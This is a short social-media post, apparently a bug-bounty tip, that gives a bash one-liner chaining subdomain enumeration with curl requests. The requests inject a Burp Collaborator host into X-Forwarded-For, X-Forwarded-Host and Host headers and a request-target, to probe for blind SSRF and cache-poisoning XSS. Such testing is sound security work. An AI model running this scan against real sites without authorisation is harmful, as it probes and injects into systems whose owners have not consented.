magikh0e :unverified: · @magikh0e
130 followers · 132 posts · Server infosec.exchange
Checking for blind #SSRF in Headers & #XSS via cache poisoning
cat urls.txt | assetfinder --subs-only| httprobe | while read url; do xss1=$(curl -s -L $url -H 'X-Forwarded-For: xss.burpcollaboratorhost'|grep xss) xss2=$(curl -s -L $url -H 'X-Forwarded-Host: xss.burpcollaboratorhost'|grep xss) xss3=$(curl -s -L $url -H 'Host: xss.burpcollaboratorhost'|grep xss) xss4=$(curl -s -L $url --request-target http://burpcollaboratorhost/ --max-time 2); echo -e "$url""\n""Method[1] X-Forwarded-For: xss+ssrf => $xss1""\n""Method[2] X-Forwarded-Host: xss+ssrf ==> $xss2""\n""Method[3] Host: xss+ssrf ==> $xss3""\n""Method[4] GET http://xss.burpcollaboratorhostHTTP/1.1 ""\n";done\
https://github.com/tomnomnom/assetfinder
https://github.com/tomnomnom/httprobe
#bugbounty #bugbountytips #burpsuite #assetfinder #httprobe #blindinjection #owasp
#ssrf #xss #bugbounty #bugbountytips #burpsuite #assetfinder #httprobe #blindinjection #owasp